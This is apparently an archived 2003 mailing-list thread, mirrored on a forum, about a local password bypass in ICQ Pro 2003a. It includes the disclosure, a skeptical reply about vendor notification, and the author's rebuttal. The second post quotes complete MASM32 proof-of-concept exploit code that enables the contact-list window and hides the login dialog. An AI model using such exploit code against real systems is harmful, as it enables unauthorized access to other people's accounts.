Likes Likes:  0
Resultaten 1 tot 2 van de 2
Geen
  1. #1
    =?koi8-r?B?Q2F1xyBNb3VyYSBQcmFkbw==?=
    Re[2]: ICQ 2003a Password Bypass
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re[2]: ICQ 2003a Password Bypass

    First off I have notified ICQ Inc. three days ago and what I got was
    an automatic reply. I have released the exploit to encourage them to
    release a new build of ICQ Pro. The vulnerability may be exploited
    locally. If it was exploitable remotely make no mistake that I would
    wait for a new release or patch before spreading my code.

    And you didn't miss anything. That's right.
    ICQ STORES the password on your machine even if you don't want to!

    Second off you've supposed wrong! This vulnerability has nothing to do with
    connection timeout exceeding. And The exploit has NO limitation.
    It does what it claims to do. If a poor soul did install ICQ 2003a on its machine
    then all UINs registered on that machine will be vulnerable. It's sad that you
    didn't try to exploit the vuln before replying me.
    If you had ran the exploit you would realize that ICQ itself sends the
    password to authenticate the session the same way it does when you
    check "save password" function! SO, there's a password and server will
    not refuse to autorize the connection! The problem is:
    If you have never checked "save password" function the password
    should not be in anyplace. But it's there.
    The exploit just enables you to click on Online status and force ICQ to
    send the correct password to the server. Got it?

    ps: ICQ is vulnerable even when you change your security level to
    High!

    see ya
    ca1

    Tuesday, July 8, 2003, 2:49:29 AM, Seva Gluschenko wrote:

    SG> Message of Cauã Moura Prado at Jul 5 13:30 ...

    CMP>> Software: ICQ 2003a
    CMP>> Threat: Login password can be bypassed locally

    SG> I maybe missed smth but does it mean ICQ 2003a and other mentioned
    SG> cache registered user's password regardless of yser's intention or you
    SG> guys just run your "exploit" just after valid user's session, so that
    SG> status might be changed back to online just before connection timeout
    SG> exceeds? I suppose, the latter.

    SG> As a matter of fact, it still can be considered an exploit, but timing
    SG> limitations must be documented properly. It's hard to believe you can
    SG> start ICQ session w/o having UIN's password because server will just
    SG> refuse to authorize that.

    SG> And, I'm afraid to ask, you notified vendors before releasing the
    SG> thing, didn't you?


    --
    Best regards,
    ca1


  2. #2
    Seva Gluschenko
    Re[2]: ICQ 2003a Password Bypass
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: ICQ 2003a Password Bypass

    Message of Cauã Moura Prado at Jul 5 13:30 ...

    CMP> Software: ICQ 2003a
    CMP> Threat: Login password can be bypassed locally

    I maybe missed smth but does it mean ICQ 2003a and other mentioned
    cache registered user's password regardless of yser's intention or you
    guys just run your "exploit" just after valid user's session, so that
    status might be changed back to online just before connection timeout
    exceeds? I suppose, the latter.

    As a matter of fact, it still can be considered an exploit, but timing
    limitations must be documented properly. It's hard to believe you can
    start ICQ session w/o having UIN's password because server will just
    refuse to authorize that.

    And, I'm afraid to ask, you notified vendors before releasing the
    thing, didn't you?

    CMP> I have found a vulnerability in ICQ Pro 2003a that
    CMP> allows anyone to connect to ICQ server using any
    CMP> account registered locally regardless the 'save
    CMP> password' option is checked or not. High level
    CMP> security password is also bypassed!
    CMP>
    CMP> How it works?
    CMP> Simple! You may use EnableWindow API to enable ICQ
    CMP> contact list window. After enabling the window you can
    CMP> set your status to online and the UIN will be
    CMP> connected no matter how high is your security level.
    CMP>
    CMP> I've coded a proof-of-concept exploit in July, 02 when
    CMP> I found the vuln.
    CMP> The exploit is provided "As is" without warranties.
    CMP> To compile it you will need MASM32.
    CMP>
    CMP> ; ««««««««««««««««««««««««« ««««««««««««««««««««««««« «««
    CMP> ««««««««««««««««««««
    CMP> ; CUT HERE - CUTE HERE - ca1-icq.asm - CUT
    CMP> HERE - CUT HERE BOF
    CMP> ; -----------------------------------------------------
    CMP> --------------------
    CMP> ;
    CMP> ; 07/02/2003 - ca1-icq.asm
    CMP> ; ICQ Password Bypass exploit.
    CMP> ; written by Cauã Moura Prado (aka ca1)
    CMP> ; mouraprado@infoguerra.com.br - ICQ 373313
    CMP> ;
    CMP> ; This exploit allows you to login to ICQ server
    CMP> using any account registered *locally*
    CMP> ; no matter the 'save password' option is checked or
    CMP> not. High level security is also bypassed.
    CMP> ; All you have to do is run the exploit and set
    CMP> status property using your mouse when the flower
    CMP> ; is yellow. If you accidentally set status to
    CMP> offline then you will need to restart ICQ and run
    CMP> ; the exploit again. Greets to: Alex Demchenko(aka
    CMP> Coban), my cousin Rhenan for testing the exploit
    CMP> ; on his machine and that tiny Israeli company for
    CMP> starting the whole thing. Oh sure.. hehehe
    CMP> ; I can't forget... many kisses to those 3 chicks
    CMP> from my building for being so hot!!
    CMP> ;
    CMP> ;
    CMP> ; uh-oh!
    CMP> ; ___
    CMP> ; __/ \__
    CMP> ; / \___/ \ Vulnerable:
    CMP> ; \__/+ +\__/ ICQ Pro 2003a Build #3800
    CMP> ; / ~~~ \
    CMP> ; \__/ \__/ Not Vulnerable:
    CMP> ; \___/ ICQ Lite alpha Build 1211
    CMP> ; ICQ 2001b and ICQ 2002a
    CMP> ; tHe Flaw Power All other versions were not
    CMP> tested.
    CMP> ;
    CMP> coded with masm32
    CMP> ;
    CMP> __________________________________________________ _____
    CMP> ________________________exploit born in .br
    CMP>
    CMP> .386
    CMP> .model flat, stdcall
    CMP> option casemap:none
    CMP> include \masm32\include\user32.inc
    CMP> include \masm32\include\kernel32.inc
    CMP> includelib \masm32\lib\user32.lib
    CMP> includelib \masm32\lib\kernel32.lib
    CMP> .data
    CMP> szTextHigh byte 'Password Verification', 0
    CMP> szTextLow byte 'Login to server', 0
    CMP> szClassName byte '#32770', 0
    CMP> .data?
    CMP> hWndLogin dword ?
    CMP> .code
    CMP> _entrypoint:
    CMP> invoke FindWindow, addr szClassName, addr szTextHigh
    CMP> mov hWndLogin, eax
    CMP> .if hWndLogin == 0
    CMP> invoke FindWindow, addr szClassName, addr szTextLow
    CMP> mov hWndLogin, eax
    CMP> .endif
    CMP> invoke GetParent, hWndLogin
    CMP> invoke EnableWindow, eax, 1 ;Enable ICQ contact
    CMP> list
    CMP> invoke ShowWindow, hWndLogin, 0 ;get rid of Login
    CMP> screen (don't kill this window)
    CMP> invoke ExitProcess, 0 ;uhuu.. cya! i gotta
    CMP> sleep!
    CMP> end _entrypoint
    CMP>
    CMP> ; ««««««««««««««««««««««««« ««««««««««««««««««««««««« «««
    CMP> ««««««««««««««««««««
    CMP> ; CUT HERE - CUTE HERE - ca1-icq.asm - CUT
    CMP> HERE - CUT HERE EOF
    CMP> ; -----------------------------------------------------
    CMP> --------------------
    CMP>

    SY, Seva Gluschenko, just stranger on The Road.
    Demos-Internet NOC | GVS-RIPE | GVS3-RIPN

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics